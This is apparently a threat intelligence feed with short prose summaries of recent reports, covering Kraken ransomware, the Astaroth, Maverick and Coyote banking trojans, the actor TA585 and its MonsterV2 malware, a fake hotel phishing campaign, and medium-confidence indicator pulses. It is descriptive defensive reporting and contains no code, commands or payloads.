LATEST THREAT INTELLIGENCE.
Unleashing the Kraken ransomware group
Description: The Kraken ransomware group, emerging from the remnants of the HelloKitty cartel, has been observed conducting big-game hunting and double extortion attacks. Utilizing SMB vulnerabilities for initial access, they employ tools like Cloudflared for persistence and SSHFS for data exfiltration. Kraken's cross-platform ransomware targets Windows, Linux, and VMware ESXi environments, featuring a unique benchmarking capability. The group operates a data leak site and has announced a new underground forum called 'The Last Haven Board'. Kraken's sophisticated ransomware includes extensive command-line options, encryption performance testing, and anti-analysis techniques. It targets various file types, including SQL databases and network shares, while employing multi-threaded encryption and self-deletion processes to evade detection.
Created at: 2025-11-13T18:04:27.513000
Updated at: 2025-11-13T20:01:58.279000
Infrastructure of Interest: Medium Confidence Detection
Description: These indicators of compromise (IOCs) were identified through LevelBlue Labs' proprietary collection and threat hunting processes, leveraging AI-driven heuristics to detect anomalous patterns, behavioral analysis of malicious activity, and cross-referenced intelligence from endpoint telemetry and external sources. Use this data to enhance detection rules, block malicious infrastructure, or correlate with existing incident investigations. These indicators have been assigned a medium confidence level regarding their maliciousness. They are therefore subject to further review, and feedback is greatly appreciated.
Created at: 2025-08-07T07:39:42.586000
Updated at: 2025-11-13T11:44:21.078000
Infrastructure of Interest: Medium Confidence Phishing
Description: These indicators of compromise (IOCs) were identified through LevelBlue Labs' proprietary collection and threat hunting processes, leveraging AI-driven heuristics to detect anomalous patterns, behavioral analysis of malicious activity, and cross-referenced intelligence from endpoint telemetry and external sources. The IOCs included in this pulse are associated with phishing campaigns, targeting credential theft and fraudulent resource access. Use this data to enhance detection rules, block malicious infrastructure, or correlate with existing incident investigations. These indicators have been assigned a medium confidence level regarding their maliciousness. They are therefore subject to further review, and feedback is greatly appreciated.
Created at: 2025-08-07T07:20:01.253000
Updated at: 2025-11-13T11:43:59.515000
Banking Trojan Abusing GitHub for Resilience
Description: A new Astaroth banking trojan campaign has been discovered abusing GitHub to host malware configurations. The infection begins with a phishing email containing a link to download a zipped Windows shortcut file, which installs the Astaroth malware. The trojan detects when users access banking or cryptocurrency websites and steals credentials through keylogging. It sends stolen information to attackers using Ngrok reverse proxy and uses GitHub to update its configuration when command and control servers become inaccessible. The malware primarily targets South American countries, with a focus on Brazil. Astaroth employs various anti-analysis techniques and targets specific banking and cryptocurrency-related sites. The GitHub repositories hosting the malicious configurations have been reported and taken down.
Created at: 2025-10-14T09:10:41.293000
Updated at: 2025-11-13T09:02:03.824000
When the monster bytes: tracking TA585 and its arsenal
Description: TA585 is a sophisticated cybercriminal threat actor that operates its entire attack chain, from infrastructure to email delivery and malware installation. The actor demonstrates innovation in the evolving cybercrime landscape, using unique web injection campaigns and complex filtering techniques. TA585 frequently delivers MonsterV2, a versatile malware with remote access trojan, loader, and stealer capabilities. MonsterV2 is used by multiple threat actors and avoids infecting computers in Commonwealth of Independent States countries. The malware is actively maintained and updated, with pricing ranging from $800 to $2,000 per month. TA585's campaigns often involve compromised websites, fake CAPTCHAs, and GitHub-themed attacks to deliver various payloads.
Created at: 2025-10-14T03:39:57.707000
Updated at: 2025-11-13T03:01:31.599000
Infrastructure of Interest: Medium Confidence FastFlux
Description: These indicators of compromise (IOCs) were identified through LevelBlue Labs' proprietary collection and threat hunting processes, leveraging AI-driven heuristics to detect anomalous DNS patterns, behavioral analysis of rapid IP rotation, and cross-referenced intelligence from global sinkhole data and network telemetry. The IOCs included in this pulse are associated with Fastflux networks, characterized by constantly changing IP addresses and DNS records to evade detection while maintaining resilient malicious infrastructure for phishing, malware delivery, or C2 operations. Use this data to enhance DNS-based detection rules, identify flux parent domains, and disrupt threat actor network resilience. These indicators have been assigned a medium confidence level regarding their maliciousness. They are therefore subject to further review, and feedback is greatly appreciated.
Created at: 2025-08-07T07:34:03.778000
Updated at: 2025-11-12T11:12:35.355000
Infrastructure of Interest: Medium Confidence InfoStealer
Description: These indicators of compromise (IOCs) were identified through LevelBlue Labs' proprietary collection and threat hunting processes, leveraging AI-driven heuristics to detect anomalous patterns, behavioral analysis of malicious activity, and cross-referenced intelligence from endpoint telemetry and external sources. The IOCs included in this pulse are associated with infostealer malware, designed to harvest sensitive data such as credentials, cookies, and financial information from compromised systems. Use this data to enhance detection rules, block malicious infrastructure, or correlate with existing incident investigations involving data theft. These indicators have been assigned a medium confidence level regarding their maliciousness. They are therefore subject to further review, and feedback is greatly appreciated.
Created at: 2025-08-07T07:31:55.617000
Updated at: 2025-11-12T11:12:33.081000
Analyzing the Link Between Two Evolving Brazilian Banking Trojans
Description: This intelligence report examines the connection between two Brazilian banking trojans, Maverick and Coyote. The malware spreads through WhatsApp, using a multi-stage attack that begins with a malicious LNK file. Both trojans share similarities in their infection methods, targeting Brazilian users and banks. The attack chain involves obfuscated PowerShell commands, downloading additional payloads from command and control servers. The malware employs anti-analysis techniques and targets specific browsers. Persistence is achieved through a batch file in the startup folder. The report provides technical details, including code samples and infection chain analysis, as well as indicators of compromise for the identified malware campaign.
Created at: 2025-11-12T09:45:13.946000
Updated at: 2025-11-12T09:47:38.934000
Thousands of Fake Hotel Domains Used in Massive Phishing Campaign
Description: A Russian-speaking threat actor has orchestrated a large-scale phishing campaign targeting travelers by registering over 4,300 domain names since early 2025. The sophisticated operation impersonates major travel brands like Airbnb and Booking.com to steal payment card data. The phishing sites use customized pages based on unique URL strings, fake CAPTCHA systems, and multilingual translations to appear legitimate. The campaign employs malicious emails with links that redirect through multiple sites before reaching the phishing page. The attacker consistently registers new domains, focusing on specific registrars and using naming conventions that incorporate travel-related terms and hotel names. The phishing kit includes real-time data collection and Russian language elements in the source code.
Created at: 2025-11-11T18:26:17.167000
Updated at: 2025-11-11T18:31:27.495000
Infrastructure of Interest: Medium Confidence Command And Control
Description: These indicators of compromise (IOCs) were identified through LevelBlue Labs' proprietary collection and threat hunting processes, leveraging AI-driven heuristics to detect anomalous patterns, behavioral analysis of malicious activity, and cross-referenced intelligence from endpoint telemetry and external sources. The IOCs included in this pulse are associated with command and control (C2) infrastructure, facilitating malware communication, data exfiltration, and persistent threat actor operations. Use this data to enhance detection rules, block malicious infrastructure, or correlate with existing incident investigations. These indicators have been assigned a medium confidence level regarding their maliciousness. They are therefore subject to further review, and feedback is greatly appreciated.
Created at: 2025-08-07T07:29:37.542000
Updated at: 2025-11-11T17:41:27.053000
